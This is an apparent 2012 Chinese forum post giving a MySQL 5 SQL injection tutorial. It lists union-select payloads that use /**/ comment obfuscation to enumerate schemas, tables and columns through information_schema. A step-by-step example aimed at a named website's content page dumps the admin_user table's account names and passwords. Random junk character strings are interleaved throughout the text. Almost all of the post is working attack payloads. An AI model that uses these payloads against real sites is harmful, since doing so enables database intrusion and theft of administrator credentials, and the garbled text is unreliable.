查库9 d7 y! {, z% {# T; r
6 c9 f+ j4 S3 [* t' x% Wid=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*9 _% g: R% B( b
7 i$ `! w: b4 [' l3 @( F查表 j7 p. q9 c- i/ Z+ R
! A2 [" G" J+ O# K' H) oid=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,17 Y9 z: W+ @; ~& D4 N
' K6 k0 d& z% _7 s8 F# `+ N }1 h查段
2 d2 |$ w5 y) Y7 c; Y& l, u U) c$ K. U8 }9 M* ^+ e' b
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
4 D5 y. O6 m/ F; q( [% r( M% h9 M; T
4 x4 G( M- C5 j3 n0 ?( }8 a' ?/ fmysql5高级注入方法暴表
3 M, y' W; v" Z+ K8 A! a( |3 u+ O: I: g% f' ]8 c4 u, u. A' C
例子如下:
; |- Z7 W9 M% ~1 [/ z! ~) }' _* I% A# z% S( z* W
1.爆表
' A% _) a+ d+ ^: Hhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet): o" _6 o: N2 e$ I8 n9 M- M; J
这样爆到第4个时出现了admin_user表。
% Y8 b; X( T$ W; C7 s" q7 J4 |9 b c
- O( C$ C+ ?3 ^! h2.暴字段, g5 X" `1 M* {
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
! y& C, Q$ ~) e# m ?8 ~. {% B) Q% C- K* _( p
, d b+ q6 V6 @! h0 a' r
3.爆密码
* P( c8 @+ o7 j2 Ghttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* & t4 {' H1 k" G9 q
2 Y! f; b. y6 P* o3 x6 Z
0 U' P# |! O. `9 O |
发表于 2012-9-13 16:29:37
收藏
支持
反对